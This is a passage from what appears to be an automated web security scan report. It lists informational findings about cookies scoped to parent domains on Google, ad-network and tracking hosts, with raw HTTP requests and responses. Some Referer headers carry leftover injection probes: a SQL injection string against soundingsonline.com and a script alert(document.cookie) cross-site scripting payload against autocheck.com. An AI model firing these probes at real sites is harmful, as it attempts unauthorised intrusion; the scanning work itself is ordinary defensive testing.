Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; RMFL=011PcqlQU10EfJ|U10Eo1; NXCLICK2=011PcqlaNX_TRACK_Nutrisystem/Retarget_Landingpage_Nonsecure!y!B3!EfJ!pUFr

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 01:35:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFL=011PhXoxU10EfJ|U10Eo1|U10166E; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
Set-Cookie: NXCLICK2=011PhXoxNX_TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure!y!B3!166E!1MSss; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
Location: http://imagen01.247realmedia.com/RealMedia/ads/Creatives/USNetwork/BCN2010110276_000_RadioShack/1x1trans.gif
Content-Length: 380
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Tue, 25-Jan-2011 01:36:47 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://imagen01.247realmedia.com/RealMedia/ads/
...[SNIP]...

13.124. http://news.google.com/news/story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/story

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • NID=43=l1BiwdjcCTroTK-K11vpoJYXA2GR-MKqNnvn-usQ9nG-kEelHz0dvh9l2PAxuhYkYQR3A8EcDoxLFigNK6u0PyNFzCobPo82nFHUXfrDtZTwHPkXlQ3qqJ0QRzynQjQS;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:05 GMT;HttpOnly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/story HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=l1BiwdjcCTroTK-K11vpoJYXA2GR-MKqNnvn-usQ9nG-kEelHz0dvh9l2PAxuhYkYQR3A8EcDoxLFigNK6u0PyNFzCobPo82nFHUXfrDtZTwHPkXlQ3qqJ0QRzynQjQS;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:05 GMT;HttpOnly
Location: /news?pz=1&hl=en&ned=us
Date: Mon, 24 Jan 2011 22:43:05 GMT
Expires: Mon, 24 Jan 2011 22:43:05 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/news?pz=1&amp;hl=en&amp;ned=us">here</A>.
</B
...[SNIP]...

13.125. http://news.google.com/nwshp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /nwshp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • NID=43=E781T2uXYKpJesTpQSj-QmWvpOJw0eAB35y5tD9Y9YMJOnjI_daOzuxSBWDXOMdoEL2Vftts46kKWniW_IBOj-_IL66C68vTFDtYjDMwKwZMxerdWsyuLeaEUJRnxDP1;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:04 GMT;HttpOnly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nwshp HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=E781T2uXYKpJesTpQSj-QmWvpOJw0eAB35y5tD9Y9YMJOnjI_daOzuxSBWDXOMdoEL2Vftts46kKWniW_IBOj-_IL66C68vTFDtYjDMwKwZMxerdWsyuLeaEUJRnxDP1;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:04 GMT;HttpOnly
Date: Mon, 24 Jan 2011 22:43:04 GMT
Expires: Mon, 24 Jan 2011 22:43:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...

13.126. http://news.webshots.com/photo/1059414821042998563QWNlxQ/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.webshots.com
Path:   /photo/1059414821042998563QWNlxQ/x22

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • AB_ID=5829807500397041135; domain=.webshots.com; path=/; expires=Sun, 19-Jan-2031 22:44:08 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /photo/1059414821042998563QWNlxQ/x22 HTTP/1.1
Host: news.webshots.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 24 Jan 2011 22:43:59 GMT
Server: Resin/3.0.23
Location: http://community.webshots.com/oldphoto.html
Set-Cookie: AB_ID=5829807500397041135; domain=.webshots.com; path=/; expires=Sun, 19-Jan-2031 22:44:08 GMT
Set-Cookie: session_source=webs; domain=.webshots.com; path=/
Content-Length: 0
Set-Cookie: NSC_ed3-xt-bqq-cbdlfoe-mc=e24d345029a0;path=/
Vary: Accept-Encoding
Content-Type: text/plain


13.127. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • OAX=rcHW800+NG4ADRRy; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:24:46 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW800+NG4ADRRy; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4570
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/
...[SNIP]...

13.128. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • OAX=rcHW800+NmAABp5o; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Referer: http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: oasc05139.247realmedia.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:33:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW800+NmAABp5o; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4263
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1806063784/Middle
...[SNIP]...

13.129. http://pc3.yumenetworks.com/dynamic_btx/118_12345

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pc3.yumenetworks.com
Path:   /dynamic_btx/118_12345

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • ymbt=0rO0ABXcQAAAAAQAAAHYAAARgAAAAAA**; Domain=.yumenetworks.com; Expires=Sat, 26-Mar-2011 02:19:11 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dynamic_btx/118_12345 HTTP/1.1
Host: pc3.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:11 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
YmBtHdr: @BT118_1_0
Set-Cookie: ymbt=0rO0ABXcQAAAAAQAAAHYAAARgAAAAAA**; Domain=.yumenetworks.com; Expires=Sat, 26-Mar-2011 02:19:11 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

GIF89a.............!...
...,...........L..;

13.130. http://picasaweb.google.com/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • S=photos_html=EEexv5AfGzAjkzXsNwMmwQ; Domain=.google.com; Path=/; HttpOnly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: Mon, 24 Jan 2011 16:02:04 GMT
Date: Mon, 24 Jan 2011 16:02:04 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=ffbRQhyMGl9D; Path=/; HttpOnly
Set-Cookie: S=photos_html=EEexv5AfGzAjkzXsNwMmwQ; Domain=.google.com; Path=/; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?hl=en_US&continue=http%3A%2F%2Fpicasaweb.google.com%2Flh%2Flogin%3Fcontinue%3Dhttp%253A%252F%252Fpicasaweb.google.com%252Fhome&service=lh2&ltmpl=gp&passive=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?h
...[SNIP]...

13.131. http://picasaweb.google.com/lh/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • S=photos_html=glkstgCRHSUXAYU8LXZieg; Domain=.google.com; Path=/; HttpOnly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Mon, 24 Jan 2011 16:02:05 GMT
Date: Mon, 24 Jan 2011 16:02:05 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=MJQEmi1qTlzO; Path=/; HttpOnly
Set-Cookie: S=photos_html=glkstgCRHSUXAYU8LXZieg; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

13.132. http://ping.crowdscience.com/ping.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • __csv=286f8b371579253c; Domain=.crowdscience.com; expires=Sun, 24 Apr 2011 22:21:01; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Ftweetmeme.com%2F&id=5c5c650d27&u=mozilla%2F5.0%20(windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us)%20applewebkit%2F534.10%20(khtml%2C%20like%20gecko)%20chrome%2F8.0.552.237%20safari%2F534.10&x=1295907703307&c=0&t=0&v=0 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:21:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=286f8b371579253c; Domain=.crowdscience.com; expires=Sun, 24 Apr 2011 22:21:01; Path=/
Content-Length: 867
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

document.cookie = '__cst=c361a3372a99df5c;path=/';
document.cookie = '__csv=286f8b371579253c;path=/;expires=' + new Date(new Date().getTime() + 7776000000).toGMTString();
if ('2d2e35941c7237e0'!='1')
...[SNIP]...

13.133. http://pix01.revsci.net/H05525/b3/0/3/360/1/0/12DBAF7B7D9/0/0/00000000/722681440.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix01.revsci.net
Path:   /H05525/b3/0/3/360/1/0/12DBAF7B7D9/0/0/00000000/722681440.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • rsi_segs_1000000=pUPFekOFbwIUllNab/ezT+71tZc3ltU2c6Ot/evo4ZtovTXUVHSclqCxKr7OS2Tzwu4/ImKEN8BiOobyb3WUFAnv+oHe6qUcrWMruZg9+u2gfzq3cXL5QuB06QtfVNA8x1zeoA1Q4OW3y0hdHSsQb0Nq4ylOyx51VXuI7xeDLFEtKloAjPKQGJsHD2wp8shP4CizzpdqkyYnPP/VZgm2vL/HVZjLwI2vTVOuAtw0dbl8Nx7cbw9B+miy5yfK; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:19:11 GMT; Path=/
  • NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Tue, 22-Feb-2011 02:19:11 GMT; Path=/
  • rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d8IQUDaybNyCnRbnxo06dBQo6MP+y2flHvCWwRN8R9QUy/ewmRfIY0CQ7gY2Fz5GIodV599nhNMkQuVM5gmbrYq7x5I21/KffdTJpt7T0ZTSX1eK3qBIo7MivlBA41pJ1L7pGL/iJtvadgZSAkPC3F; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:19:11 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H05525/b3/0/3/360/1/0/12DBAF7B7D9/0/0/00000000/722681440.gif?D=DM_LOC%3Dhttp%3A%2F%2Fwww.autocheck.com%2F%253FWT.mc_id%253D1824%2526siteID%253D182471a71%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%2Fscript%25253E6dab831a574%2526type%253D%2526make%253D%2526model%253D%2526sid%253DExperian%2526Year%253D%2526section%253D%2526content%253D%26DM_REF%3Dhttp%3A%2F%2Fburp%2Fshow%2F54%26DM_EOM%3D1 HTTP/1.1
Host: pix01.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPFfEOlLgIYlVNWKZU1sWJH1I8V0sD586OtYWpJIZ5At588pHu0XtJj0vEjmwH5W+0fVgtXKwemg4X+X+ZcSFKrAeiVdwmYRcxYnZGANiwodqN5uhpI2RG7gf2tidEme72Dc6LcL4puWziUNiMSVj9Rlec2UMv/RY8CSw1fUUBq299ft5vcz4/QVANk+xUmIlgaIoFCnYcBk/VuIcXautuNt5oFCJuLKVA=; udm_0=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; rsi_us_1000000=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFekOFbwIUllNab/ezT+71tZc3ltU2c6Ot/evo4ZtovTXUVHSclqCxKr7OS2Tzwu4/ImKEN8BiOobyb3WUFAnv+oHe6qUcrWMruZg9+u2gfzq3cXL5QuB06QtfVNA8x1zeoA1Q4OW3y0hdHSsQb0Nq4ylOyx51VXuI7xeDLFEtKloAjPKQGJsHD2wp8shP4CizzpdqkyYnPP/VZgm2vL/HVZjLwI2vTVOuAtw0dbl8Nx7cbw9B+miy5yfK; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:19:11 GMT; Path=/
Set-Cookie: NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Tue, 22-Feb-2011 02:19:11 GMT; Path=/
Set-Cookie: rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d8IQUDaybNyCnRbnxo06dBQo6MP+y2flHvCWwRN8R9QUy/ewmRfIY0CQ7gY2Fz5GIodV599nhNMkQuVM5gmbrYq7x5I21/KffdTJpt7T0ZTSX1eK3qBIo7MivlBA41pJ1L7pGL/iJtvadgZSAkPC3F; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:19:11 GMT; Path=/
X-Proc-ms: 45
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Tue, 25 Jan 2011 02:19:10 GMT

GIF89a.............!.......,...........D..;

13.134. http://pix04.revsci.net/D08734/a1/0/3/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • rsi_segs_1000000=pUPFe0PF7gMQVVNGyQq+TU2VE+8mA39mBOeRh8RvTJt273WYJS9QISCAgxkL8VjFACM37MfrDDLUs0/J7x6i1dFRPx6pUlOXaI5/n7KF+o95GFlfu6bAQxdbksk/G6ZetLtVuUHObHxtaAhT6IXAr41re6IGCI3YkT7Ot5GHMsd00VnbeSE3LED2fRDf76H+UXNnAo6GqQf642LViN27Nm5ci4P2QCs/mQ==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
  • udm_0=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; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
  • rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d80gUDW6ZteHnhbnxoW32lNFY0RqP3YO00gC9MvXLUz2hBYjVv/fgqyTx1ReFJEGLEnkzsXGVm9+/kBk41UxopUKSTrKRzkQ5YXg==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fna.com%253Fnada%253D%2526naid%253D%2526namp%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; udm_0=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; rsi_us_1000000=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; rsi_segs_1000000=pUPFfcnGLgIUllNabySXY2IY55gHIZ1QyKSeDed+9JzIG0W8+AvdYSYAvxOUI2VbrccphmHkGcSot3nYvefOg9C/MS0+qcd1BcnTcNaYEkF0xialv9bj0hdb5U5jkD/4MjdaHkbSa+M/fe/FnBrMkcx0mUp01NJdnnpXlDRY2lXJS+GRf809xmH4pSnkubT29s7GCNDtfCsSqFFM2AiI79rbsE4FMdY=; rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFe0PF7gMQVVNGyQq+TU2VE+8mA39mBOeRh8RvTJt273WYJS9QISCAgxkL8VjFACM37MfrDDLUs0/J7x6i1dFRPx6pUlOXaI5/n7KF+o95GFlfu6bAQxdbksk/G6ZetLtVuUHObHxtaAhT6IXAr41re6IGCI3YkT7Ot5GHMsd00VnbeSE3LED2fRDf76H+UXNnAo6GqQf642LViN27Nm5ci4P2QCs/mQ==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
Set-Cookie: rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d80gUDW6ZteHnhbnxoW32lNFY0RqP3YO00gC9MvXLUz2hBYjVv/fgqyTx1ReFJEGLEnkzsXGVm9+/kBk41UxopUKSTrKRzkQ5YXg==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
X-Proc-ms: 2
